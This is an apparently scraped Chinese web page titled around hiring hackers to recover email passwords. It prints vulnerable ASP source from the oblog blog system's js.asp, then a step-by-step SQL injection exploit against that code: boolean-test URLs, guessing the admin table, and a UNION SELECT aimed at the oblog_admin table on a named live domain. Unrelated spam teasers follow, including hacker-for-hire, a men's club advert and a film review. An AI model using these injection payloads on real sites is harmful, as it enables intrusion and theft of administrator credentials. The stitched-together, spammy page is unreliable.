找黑客找回邮箱密码-你以为的黑客和现实的黑客(你眼中的黑客和现实中
漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
call showplace()
case 9
call showphoto()
case 10
call showblogstars()
Case 11
Call show_hotblog()
Case 12
Call show_teams()
Case 13
Call show_posts()
Case 14
Call show_hottag()
case 0
call showlog()
end select
****************省略部分代码******************
Sub show_posts()
Dim teamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dim rs,sql,sRet,sAddon
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
If teamid<>“” And teamid<>“0″ Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql & ” And teamid In (” & teamid & “) ”
End If
Sql=Sql & ” order by postid Desc”
Set rs=oblog.Execute(Sql)
sRet=”
”
Do While Not rs.Eof
sAddon=”"
* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”
If u=1 Then sAddon=rs(4)
if t=1 Then
If sAddon<>“” Then sAddon=sAddon & “,”
sAddon=sAddon & rs(3)
End If
If sAddon<>“” Then sAddon=”(” & sAddon & “)”
sRet=sRet & sAddon & “
”
rs.Movenext
Loop
Set rs = Nothing
sRet=sRet & “
”
Response.write oblog.htm2js (sRet,True)
End Sub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1
Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1
document.write('
相关文章
黑客用名字找电话,黑客最大网站
一、用名字电话怎么找黑客 1、找黑客由于这个原因,今天的黑客文化主要集中在Unix上。用名字电话熊猫这是一个明显的例外。找站接网单不要相信任何人所说的地点都不相信任何工具的安全。你必须尝试自己的判断和...
网络安全,黑客与程序员有那些差别?
有人说“要想成为高深的黑客,必须先成为一名优秀的程序员” 也有人说“程序员和黑客对立存在,程序员编写代码完善程序,黑客研究代码攻击程序” 有人说“一个优秀的程序员不一定是黑客,但一个黑...
石女是什么意思啊 (什么是石女?还能过夫妻生活吗?和正常人有哪些差异?)
石女是什么意思啊 (什么是石女?还能过夫妻生活吗?和正常人有哪些差异?) 小肖(化名)站在浴室的镜子前,看着镜子中的自己,泪水终于忍不住夺眶而出,她等待这一刻已经等了太久…… 自卑少女圆梦“女儿身...
2014网站移动化大赛
你知道么,据最新全球调查报告显示,目前约50%的移动用户已经把移动终端作为主要甚至是唯一的上网工具;你知道么,截止目前,中国手机即时通信用户已超过4亿;你知道么,咨询机构Gartner预计,到2014...
上海普陀的男士会所哪个好,高档自然环境,私人定制,非常值得一去~
上海普陀的男士会所哪个好,高档自然环境,私人定制,非常值得一去~ SPA指的是将水源与淋浴、推拿、护理用品的运用和芳疗紧密结合,以推动基础代谢,考虑身体的视觉效果、味蕾、听觉系统、触感和味觉,完成心...
电影《新神榜:哪吒重生》热映 豆瓣评分7.4,口
春节档电影《新神榜:哪吒重生》正在热映,截止2月12日22:00,四大平台春节档口碑第二,其中猫眼评分9.0,大V推荐度90%,豆瓣评分7.4。“哪吒帅炸,视效爽炸,直接吹...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!